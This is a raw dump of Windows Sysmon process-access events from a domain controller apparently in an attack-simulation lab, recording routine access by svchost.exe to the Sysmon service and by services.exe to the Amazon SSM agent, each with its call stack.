08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.239{5D479F2C-169F-5F84-0A00-000000007F01}8561192C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2800-000000007F01}2764C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 